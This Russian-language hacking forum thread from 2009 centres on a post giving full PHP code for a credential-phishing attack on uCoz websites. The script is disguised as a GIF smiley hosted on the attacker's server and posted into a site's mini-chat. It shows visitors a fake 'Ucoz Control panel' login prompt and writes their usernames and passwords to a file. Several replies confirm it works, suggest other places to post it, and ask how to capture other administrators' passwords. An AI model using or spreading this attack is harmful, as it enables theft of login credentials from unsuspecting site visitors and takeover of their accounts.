ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 15.02.2009, 17:32
Аватар для cash$$$
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

to NooB MC

Есть такой способ:

Нужно зарегистрировать хост с поддержкой php (например, http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например: passwords.txt (сюда будут присылаться пассы пользователей сайта), и на файл smile.gif. Далее качаем любой смайлик в расширении .gif (типа cool.gif). Потом в блокноте пишем:

Код:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
 $login = $_SERVER['PHP_AUTH_USER'];
 $pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
 {
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
 }
 elseif($login)
 {
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
 }
}
imagegif($image);
imagedestroy($image);
?>
После этого сохраняем файл под названием smile, потом меняем расширение на gif.
Теперь выбираем юкозовский сайт, например http://mysite.ucoz.ru/ потом в мини чате пишем логин, а в содержании сообщения:

[I*MG]http://mysite.phphost.net/smile.gif[/I*MG]

Если после этого в мини чате вместо сообщения появился смайлик - значит сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, будет появляться форма, в которую нужно будет ввести логин и пароль.

Ps: Но этот баг, наверное, уже прикрыли...
 
Ответить с цитированием

  #42  
Старый 16.02.2009, 21:16
Аватар для playhard.g0pr0
playhard.g0pr0
Познающий
Регистрация: 16.02.2009
Сообщений: 44
Провел на форуме:
263985

Репутация: 81
По умолчанию

Цитата:
Сообщение от cash$$$  
to NooB MC

Есть такой способ:
попробовал на своем сайте все работает

Последний раз редактировалось jokester; 17.02.2009 в 13:15.. Причина: Скопируй всю тему в /квот/
 
Ответить с цитированием

  #43  
Старый 17.02.2009, 13:07
Аватар для Rebit
Rebit
Участник форума
Регистрация: 07.08.2007
Сообщений: 136
Провел на форуме:
2010588

Репутация: 653
Отправить сообщение для Rebit с помощью ICQ
Talking

Цитата:
Сообщение от cash$$$  
to NooB MC

Есть такой способ:
Работа но не на всех сайтах

Последний раз редактировалось jokester; 17.02.2009 в 13:15.. Причина: Вы такие весёлые , ребята, я аж уписился
 
Ответить с цитированием

  #44  
Старый 25.02.2009, 18:57
Аватар для Nakq
Nakq
Новичок
Регистрация: 14.01.2009
Сообщений: 11
Провел на форуме:
289291

Репутация: 3
Отправить сообщение для Nakq с помощью ICQ
По умолчанию

Молодцы! Спс!
 
Ответить с цитированием

  #45  
Старый 27.02.2009, 02:07
Аватар для ben1991
ben1991
Новичок
Регистрация: 29.10.2008
Сообщений: 5
Провел на форуме:
36637

Репутация: 0
По умолчанию

а если я вошол в аккаунт админа , но не главного а второстепенного, я могу редактировать шаблоны но немогу зайти в админку.Какие скрипты применить чтобы найти пароли других админов и админки?
 
Ответить с цитированием

  #46  
Старый 27.02.2009, 15:38
Аватар для BlackDraG
BlackDraG
Познающий
Регистрация: 27.05.2008
Сообщений: 34
Провел на форуме:
787727

Репутация: 19
По умолчанию

Дефейс логина?
Чтобы отсылал на хост с php скриптом.
 
Ответить с цитированием

  #47  
Старый 31.03.2009, 19:42
Аватар для nik3241
nik3241
Новичок
Регистрация: 04.03.2008
Сообщений: 12
Провел на форуме:
34288

Репутация: 37
Отправить сообщение для nik3241 с помощью ICQ
По умолчанию

Цитата:
Сообщение от BlackDraG  
Дефейс логина?
Чтобы отсылал на хост с php скриптом.
ну или фейк авторизации, успех в том случае если включен img, старый способ но по сей день актуальный, хотя в админке укоза img по дефолту вроде отключен
 
Ответить с цитированием

  #48  
Старый 07.04.2009, 23:43
Аватар для sarmat2009
sarmat2009
Новичок
Регистрация: 20.03.2009
Сообщений: 2
Провел на форуме:
57668

Репутация: 2
По умолчанию

Смайл, кстати можно не только в миничат отправлять (в сообщении на форуме к примеру)
 
Ответить с цитированием

  #49  
Старый 08.04.2009, 14:17
Аватар для jenyavlg
jenyavlg
Постоянный
Регистрация: 25.08.2007
Сообщений: 365
Провел на форуме:
1289173

Репутация: 39
Отправить сообщение для jenyavlg с помощью ICQ
По умолчанию

льем на фтп скрипт
А где сам скрипт
 
Ответить с цитированием

  #50  
Старый 17.04.2009, 01:27
Аватар для -=$MiRoN$=-
-=$MiRoN$=-
Banned
Регистрация: 05.04.2009
Сообщений: 105
Провел на форуме:
314829

Репутация: 61
По умолчанию

СПС! Всё дествительно работает!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Социнженерия-как способ легкого взлома :X\SocinG\ E-Mail 13 10.11.2006 05:13
Подскажите новый способ взлома !!!! Orel Molodoi Болталка 3 20.04.2006 13:27
Новый способ взлома мыла Mertvii-Listopad E-Mail 12 21.03.2006 02:02
естЬ лИ ЭффеКтивНЫЙ спосОБ ВзлоМА mail.ru UnKn0wN E-Mail 6 03.03.2006 00:07
Простейший способ взлома мыла charlie E-Mail 36 22.06.2005 13:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ